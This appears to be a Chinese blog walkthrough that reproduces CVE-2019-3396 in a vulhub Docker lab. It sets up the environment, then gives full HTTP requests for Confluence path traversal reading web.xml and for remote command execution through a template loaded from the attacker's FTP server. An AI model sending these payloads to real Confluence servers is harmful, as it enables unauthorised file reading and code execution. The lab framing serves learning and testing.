完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

2023-10-19 17:10
文章标签 流程 路径 命令 漏洞 执行 2019 复现 cve 完整 confluence 穿越 atlassian 3396

本文主要是介绍完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

搭建环境之前,最好将虚拟机的内存调至4G

靶机ip:192.168.187.130,os:centos7

攻击主机:ip:192.168.187.130, os:kali2019,工具:burpsuite

 

(一)安装pip,docker环境

由于docker-compose需要pip来安装,首先要安装pip环境

 

1.安装docker

用root账户登陆linux,我这里用的centos7,其他的linux系统也可以

然后执行

curl -s https://get.docker.com/ | sh

然后执行docker -v查看docker是否安装成功

 

2.安装pip

curl -s https://bootstrap.pypa.io/get-pip.py|python

可以看到成功安装了两个工具,这里再检查一下有没有安装setuptools工具

执行pip install setuptools

检查pip版本pip -V

 

3. pip安装docker-compose

这里可能会遇到很多报错,参考https://www.cnblogs.com/felixqiang/p/11946644.html解决

当出现这个时,意味着docker-compose成功安装

docker-compose -v查看版本号

 

4.克隆vulhub的github库

yum install git,首先安装git

git clone https://github.com/vulhub/vulhub,克隆vulhub库,可以下载可能会比较慢

到这里结束建议保存快照,每次做完一个漏洞复现就可以恢复快照从而恢复环境

或者输入docker-compose down移除环境

 

(二)启动环境

1.启动docker环境

cd vulhub/confluence/CVE-2019-3396/,进入CVE-2019-3396目录

systemctl start docker,启动docker

systemctl status docker,检查docker是否在运行

docker-compose build && docker-compose up -d,启动漏洞环境

这里搭建时间会很久,可以搞一个加速器

sudo vi /etc/docker/daemon.json

请在该配置文件中加入(没有该文件的话,请先建一个):

{"registry-mirrors": ["http://hub-mirror.c.163.com"]
}

出现这个说明启动成功了

再看一下8090端口是否启动

 

2.启动Confluence环境

在当前linux系统访问http://localhost:8090/,选择Trial Installation

这里会要求填写license key,先不要着急,点击Get an evaluation license,获取一个临时证书

之后他会让你注册一个账户,按要求注册即可,不需要个人信息,也不需要花钱,注册好后登陆

会来的申请证书的界面,按图示操作即可(不要选择Data Center和Addons)

然后进入License,选择一个证书

复制License Key

粘贴到之前这个页面的Confluence框,如果找不到这个页面就在地址栏输入localhost:8090

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。这里千万不要中断。

如果提示填写cluster node,路径填写/home/confluence即可。

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

 至此靶机环境已经搭建完成

 

(四)漏洞复现

Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

我在kali上打开burpsuite,选择Repeater,输入如下文本,把localhost替换成靶机的ip地址,如果攻击主机和靶机是同一台机器则不用

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

点击GO执行,拿到账户文件

抓取web.xml,将localhost替换为靶机ip,如果攻击主机和靶机是同一台机器则不用,burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 172{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

 拿到web.xml

 

6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件(在攻击主机上完成该步骤)

git clone https://github.com/Yt1g3r/CVE-2019-3396_EXP.git    //先下载EXP

然后用python搭建一个临时的ftp服务器

pip install pyftpdlib

cd CVE-2019-3396_EXP     //进入这个目录

python -m pyftpdlib -p 21    //启动FTP服务

将localhost替换为靶机ip,ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用,在burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}

拿到uid

至此,漏洞复现完成。

 

可以参考Vulhub官方的复现教程

https://vulhub.org/#/environments/confluence/CVE-2019-3396/

参考文献:https://blog.csdn.net/jiangbuliu/article/details/94016753

                  http://www.ywnxs.com/1461.html

 

这篇关于完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/241200

相关文章

Linux中压缩、网络传输与系统监控工具的使用完整指南

Linux中压缩、网络传输与系统监控工具的使用完整指南

《Linux中压缩、网络传输与系统监控工具的使用完整指南》在Linux系统管理中,压缩与传输工具是数据备份和远程协作的桥梁,而系统监控工具则是保障服务器稳定运行的眼睛,下面小编就来和大家详细介绍一下它... 目录引言一、压缩与解压:数据存储与传输的优化核心1. zip/unzip:通用压缩格式的便捷操作2.
阅读更多...
Spring Security中用户名和密码的验证完整流程

Spring Security中用户名和密码的验证完整流程

《SpringSecurity中用户名和密码的验证完整流程》本文给大家介绍SpringSecurity中用户名和密码的验证完整流程,本文结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定... 首先创建了一个UsernamePasswordAuthenticationTChina编程oken对象,这是S
阅读更多...
Golang如何对cron进行二次封装实现指定时间执行定时任务

Golang如何对cron进行二次封装实现指定时间执行定时任务

《Golang如何对cron进行二次封装实现指定时间执行定时任务》:本文主要介绍Golang如何对cron进行二次封装实现指定时间执行定时任务问题,具有很好的参考价值,希望对大家有所帮助,如有错误... 目录背景cron库下载代码示例【1】结构体定义【2】定时任务开启【3】使用示例【4】控制台输出总结背景
阅读更多...
java向微信服务号发送消息的完整步骤实例

java向微信服务号发送消息的完整步骤实例

《java向微信服务号发送消息的完整步骤实例》:本文主要介绍java向微信服务号发送消息的相关资料,包括申请测试号获取appID/appsecret、关注公众号获取openID、配置消息模板及代码... 目录步骤1. 申请测试系统2. 公众号账号信息3. 关注测试号二维码4. 消息模板接口5. Java测试
阅读更多...
postgresql数据库基本操作及命令详解

postgresql数据库基本操作及命令详解

《postgresql数据库基本操作及命令详解》本文介绍了PostgreSQL数据库的基础操作,包括连接、创建、查看数据库,表的增删改查、索引管理、备份恢复及退出命令,适用于数据库管理和开发实践,感兴... 目录1. 连接 PostgreSQL 数据库2. 创建数据库3. 查看当前数据库4. 查看所有数据库
阅读更多...
SpringBoot集成LiteFlow工作流引擎的完整指南

SpringBoot集成LiteFlow工作流引擎的完整指南

《SpringBoot集成LiteFlow工作流引擎的完整指南》LiteFlow作为一款国产轻量级规则引擎/流程引擎,以其零学习成本、高可扩展性和极致性能成为微服务架构下的理想选择,本文将详细讲解Sp... 目录一、LiteFlow核心优势二、SpringBoot集成实战三、高级特性应用1. 异步并行执行2
阅读更多...
linux重启命令有哪些? 7个实用的Linux系统重启命令汇总

linux重启命令有哪些? 7个实用的Linux系统重启命令汇总

《linux重启命令有哪些?7个实用的Linux系统重启命令汇总》Linux系统提供了多种重启命令,常用的包括shutdown-r、reboot、init6等,不同命令适用于不同场景,本文将详细... 在管理和维护 linux 服务器时,完成系统更新、故障排查或日常维护后,重启系统往往是必不可少的步骤。本文
阅读更多...
Android ViewBinding使用流程

Android ViewBinding使用流程

《AndroidViewBinding使用流程》AndroidViewBinding是Jetpack组件,替代findViewById,提供类型安全、空安全和编译时检查,代码简洁且性能优化,相比Da... 目录一、核心概念二、ViewBinding优点三、使用流程1. 启用 ViewBinding (模块级
阅读更多...
基于 HTML5 Canvas 实现图片旋转与下载功能(完整代码展示)

基于 HTML5 Canvas 实现图片旋转与下载功能(完整代码展示)

《基于HTML5Canvas实现图片旋转与下载功能(完整代码展示)》本文将深入剖析一段基于HTML5Canvas的代码,该代码实现了图片的旋转(90度和180度)以及旋转后图片的下载... 目录一、引言二、html 结构分析三、css 样式分析四、JavaScript 功能实现一、引言在 Web 开发中,
阅读更多...
nginx启动命令和默认配置文件的使用

nginx启动命令和默认配置文件的使用

《nginx启动命令和默认配置文件的使用》:本文主要介绍nginx启动命令和默认配置文件的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录常见命令nginx.conf配置文件location匹配规则图片服务器总结常见命令# 默认配置文件启动./nginx
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2